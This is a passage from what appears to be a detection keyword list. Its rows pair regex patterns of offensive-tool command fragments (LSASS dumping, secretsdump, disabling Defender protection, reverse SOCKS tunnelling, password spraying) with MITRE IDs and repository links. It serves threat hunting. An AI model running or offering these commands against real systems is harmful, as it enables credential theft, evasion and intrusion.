*",".{0,1000}\s\-seatbelt\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* Seatbelt.Commands.Windows*",".{0,1000}\sSeatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "* SeatBelt.exe*",".{0,1000}\sSeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* seatbelt_json.py*",".{0,1000}\sseatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 
--seclogon-duplicate*",".{0,1000}\s\-\-seclogon\-duplicate.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* secretsdump.py*",".{0,1000}\ssecretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* self_deletion.exe*",".{0,1000}\sself_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* SeriousSam.Execute *",".{0,1000}\sSeriousSam\.Execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* --server * --cert-path *.pfx --elevate --target * --restore *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-restore\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* --server * --cert-path *.pfx --elevate --target * --sid *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-sid\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* --server * --type pass-pols*",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-type\spass\-pols.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "* server -p 80 --reverse 
--socks5*",".{0,1000}\sserver\s\-p\s80\s\-\-reverse\s\-\-socks5.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* server --restrict-http-upgrade-path-prefix *wss*",".{0,1000}\sserver\s\-\-restrict\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* server wss://[::]:*",".{0,1000}\sserver\swss\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* server.py -s tornado --cert /*pem --key /*.pem*",".{0,1000}\sserver\.py\s\-s\stornado\s\-\-cert\s\/.{0,1000}pem\s\-\-key\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* -ServerUri * -FindAmsiSignatures*",".{0,1000}\s\-ServerUri\s.{0,1000}\s\-FindAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* service -dump all-services.json*",".{0,1000}\sservice\s\-dump\sall\-services\.json.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* --service fortynorth*",".{0,1000}\s\-\-service\sfortynorth.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -ServiceName * -PipeName *",".{0,1000}\s\-ServiceName\s.{0,1000}\s\-PipeName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* servicetags.nse*",".{0,1000}\sservicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --session=allrules --wordlist*",".{0,1000}\s\-\-session\=allrules\s\-\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --SessionEnum --Host *",".{0,1000}\s\-\-SessionEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* --set-as-owned smart -bp * kerberos * --kdc-ip *",".{0,1000}\s\-\-set\-as\-owned\ssmart\s\-bp\s.{0,1000}\skerberos\s.{0,1000}\s\-\-kdc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Set-MpPreference -DisableIOAVProtection *",".{0,1000}\sSet\-MpPreference\s\-DisableIOAVProtection\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* SetMzLogonPwd *",".{0,1000}\sSetMzLogonPwd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* set-objectowner * -target-sid * -owner-sid *",".{0,1000}\sset\-objectowner\s.{0,1000}\s\-target\-sid\s.{0,1000}\s\-owner\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* setoolkit*",".{0,1000}\ssetoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "* -sgn -syscalls *",".{0,1000}\s\-sgn\s\-syscalls\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -sgn -unhook -antidebug *",".{0,1000}\s\-sgn\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* shadow auto -u * -p * -account *",".{0,1000}\sshadow\sauto\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-account\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* --shadow-credentials --shadow-target *",".{0,1000}\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* SharpBuster.dll*",".{0,1000}\sSharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "* SharpBuster.exe*",".{0,1000}\sSharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "* SharpC2*",".{0,1000}\sSharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "* -SharpChromium *",".{0,1000}\s\-SharpChromium\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 
- TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpDoor.cs*",".{0,1000}\sSharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "* SharpDoor.exe*",".{0,1000}\sSharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "* -SharpDPAPI -Command *",".{0,1000}\s\-SharpDPAPI\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpEDRChecker*",".{0,1000}\sSharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "* SharpEfsPotato*",".{0,1000}\sSharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using 
EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "* -SharPersist *",".{0,1000}\s\-SharPersist\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpHose.exe*",".{0,1000}\sSharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "* SharpHound.html*",".{0,1000}\sSharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "* SharpPersistSD.dll*",".{0,1000}\sSharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* SharpRDPHijack*",".{0,1000}\sSharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "* SharpRoast.exe*",".{0,1000}\sSharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* -SharpShares *",".{0,1000}\s\-SharpShares\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -SharpSniper *",".{0,1000}\s\-SharpSniper\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpSocks *",".{0,1000}\sSharpSocks\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -SharpSpray *",".{0,1000}\s\-SharpSpray\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* sharpspray.exe*",".{0,1000}\ssharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* -SharpUp -Command *",".{0,1000}\s\-SharpUp\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -Sharpview *",".{0,1000}\s\-Sharpview\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 